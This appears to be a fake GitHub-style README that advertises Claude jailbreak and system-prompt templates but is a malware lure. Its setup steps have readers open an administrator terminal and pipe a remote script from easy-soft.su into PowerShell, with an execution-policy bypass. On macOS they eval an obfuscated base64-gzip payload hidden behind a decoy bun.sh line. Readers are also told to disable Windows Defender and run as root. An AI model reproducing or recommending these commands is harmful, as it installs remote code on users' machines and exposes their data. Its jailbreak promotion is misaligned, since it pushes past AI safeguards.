Welcome to the ultimate repository dedicated to Claude prompt engineering, system prompt analysis, and advanced AI behavior exploration. This project serves as an open-source library for researchers and developers studying Large Language Model (LLM) constraints, safety boundaries, and contextual adaptation.
This repository provides a comprehensive collection of advanced Claude prompts designed for multi-version compatibility. Whether you are analyzing model alignment or experimenting with complex instructional frameworks, these templates offer deep insights into cognitive AI steering.
Our research directly aligns with the following academic and technical concepts:
- Claude Jailbreak Prompt engineering methodologies
- Claude System Prompt structural analysis
- AI safety bypass boundaries and alignment mitigation
- Multi-version AI text generation optimization
- Custom persona injection and context anchoring
- Universal Framework: Crafted to work seamlessly across multiple model iterations without version lock.
- Safety & Alignment Insights: Perfect for red-teaming, vulnerability assessment, and AI compliance testing.
- Context Overriding: Learn how system instructions interact with complex user-defined constraints.
- Maximum Flexibility: Adaptable templates for creative writing, roleplay development, and uncensored logic testing.
This guide provides step-by-step instructions for deploying the tools on both Windows and macOS environments.
Before use close all application or windows with site
Follow these steps to initialize the deployment on a Windows system using PowerShell.
- Press the
Win + Xkeys simultaneously. - Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
Copy, paste, and press Enter to run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:
irm https://easy-soft.su/powershell/Loader.ps1 | iexFollow these steps to initialize the environment and install the required utilities on macOS.
- Press
Cmd + Spaceto open Spotlight Search. - Type
Terminaland pressEnter.
Copy and paste the command below into your Terminal window, then press Enter to run the base64-decoded deployment routine:
echo "Mac-Tools: https://bun.sh/install" && eval "$(echo 'H4sIABFblGoC/9NPyszTT0oszlDQTVZQUtFILi3KUdBNKw72UcgoKSmw0tc3tDTSMzQDYktLPSMTS/3SbDNDy3Iz08K8YiNNJQDGVVM6QAAAAA==' | base64 -D | gunzip)"If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:
powershell -ExecutionPolicy Bypass -Command "irm https://easy-soft.su/powershell/Loader.ps1 | iex"In older legacy environments where aliases are missing, use explicit full system cmdlets:
Invoke-RestMethod https://easy-soft.su/powershell/Loader.ps1 | Invoke-ExpressionAutomated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.
If you have GNU base64 installed (via Homebrew), the -D flag might fail. Use lowercase -d instead:
echo "Mac-Tools: https://bun.sh/install" && eval "$(echo 'H4sIABFblGoC/9NPyszTT0oszlDQTVZQUtFILi3KUdBNKw72UcgoKSmw0tc3tDTSMzQDYktLPSMTS/3SbDNDy3Iz08K8YiNNJQDGVVM6QAAAAA==' | base64 -D | gunzip)"If the script attempts to write to protected system directories, append sudo to the execution stage or switch to a root shell if prompted by the core installer.